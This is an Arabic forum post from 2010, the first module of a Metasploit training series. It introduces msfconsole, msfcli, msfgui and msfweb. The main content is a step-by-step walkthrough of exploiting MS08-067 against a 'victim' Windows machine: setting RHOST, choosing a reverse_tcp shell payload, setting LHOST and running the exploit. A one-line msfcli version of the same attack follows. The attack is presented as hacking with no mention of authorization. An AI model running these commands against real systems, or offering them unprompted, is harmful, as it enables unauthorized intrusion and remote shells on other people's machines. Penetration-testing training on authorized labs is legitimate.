عرض مشاركة واحدة
قديم 02-03-2010, 01:48 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
data$hack
 
الصورة الرمزية data$hack
 

 

 
إحصائية العضو







data$hack غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
data$hack is on a distinguished road

افتراضي module 1 : ماهي msfconsole,msfcli,msfweb,msfgui و نبذة عن الأوامر .(METASPLOIT TRANNING)


السلام عليكم ورحمة الله وبركاته
بسم الله الرحمن الرحيم





في هذا الدرس :
ستتعرف msfconsole واوامره , كيفية العمل به
ستتعرف msfcli
ستتعرف msfgui
ستتعرف msfweb


مشروع Metasploit مشروع كبير جدا و مشهور عالميا ، بدايته كانت سنة 2003 , كان يحتوي على القليل من exploits و payloads , فبدأت عملية التطور ليصل اليوم محملا ب 496 exploits و 192 payloads و 239 auxiliary. بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow ... و الكثير الكثير


سنتحدث اكثر عن msfconsole
تعريف صغير عن البقية

-----------------------
msfconsole
-----------------------
تجدونها على باك تراك هنا :
كود PHP:
pentest/exploits/framework3/msfconsole 


ندخل الان في الاوامر :
اهم امر help
لن اشرحو هههه

امر show :
show exploits
اظهار جميع الثغرات

show payloads
اظهار جميع payload

show auxiliary
اظهار جميع auxiliary

search
للبحث ;مثال :


امر info
تعطينا معلومات ;مثال :


امر use
احنا عندنا ثغرة نريد استخدامها ،
اذا use ;مثال :
كود PHP:
msf > use windows/smb/ms08_067_netapi
msf exploit
(ms08_067_netapi) > 
اكتب show options لترى options الثغرة ;مثال :


ماذا يهمنا هنا ???
الظحية rhost
rport البورت المصاب اتركه كما هو
نظع ip الظحية set RHOST ip ;مثال :
كود PHP:
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.2
RHOST 
=> 192.168.1.2 
الان نأتي الى المهم ال payload
باختصار هو كيفية التحكم بجهاز victim
اكتب show payloads من ثم اختر واحدا
باختصار هذه ال payload هي الاقوى :
كود PHP:
windows/shell/reverse_tcp
windows
/shell/bind_tcp
windows
/vncinject/bind_tcp
windows
/meterpreter/reverse_tcp 
سنأتي على تعريفها في الدروس القادمة

نظع ال set payload :::payload ;مثال :
كود PHP:
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload 
=> windows/shell/reverse_tcp 
اكتب show options لترى options الثغرة again ;مثال :


هههه كبرت
شوف lhost تظع هنا ال ip تبعك ;مثال :
كود PHP:
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.3
LHOST 
=> 192.168.1.3 
كل شيء تمام

الان اكتب exploit للاستغلال ;مثال :


:icon555: :00001793[1]:

تم الاخترق

ملا حظة هامة جدا
انا استعملت ثغرة windows/smb/ms08_067_netapi
يعني انت ممكن تمشي معاك ممكن لا
استعمل ما تعلمته قبل قليل للبحث عن ثغرة تعمل
ان شاء الله استفدتوووا

-----------------------
msfcli
-----------------------

باختصار هيا للاختصار
مثال :
كود PHP:
/pentest/exploits/framework3/msfcli windows/smb/ms08_067_netapi payload=windows/shell/reverse_tcp RHOST=192.168.1.2 LHOST=192.168.1.2 E 
-----------------------
msfgui
-----------------------
للاغبياء فقط :icon666:
تشغيلها سهل :
كود PHP:
pentest/exploits/framework3/msfgui 


-----------------------
msfweb
-----------------------
الاجمل و الاروع :666:
تشغيلها سهل :
كود PHP:
pentest/exploits/framework3/msfweb 
ثم اذهب للمتصفح :
كود PHP:
http://127.0.0.1:55555/ 


ان شاء الله اكون وصلت بعض المعلومات و لو القليل
ان شاء الله بتفهم اكثر مع الدروس القادمة
ارجوا من اصحاب القلوب المريضة حفض الحقوق والله تعبت عليه
best regards
data$hack



module 1 : lhid msfconsole(METASPLOIT TRANNING)

التوقيع


data$hack : EIP HUNTER


Ninja-security team
http://Pentest101.blogspot.com

 


التعديل الأخير تم بواسطة data$hack ; 02-03-2010 الساعة 01:53 AM.

   

رد مع اقتباس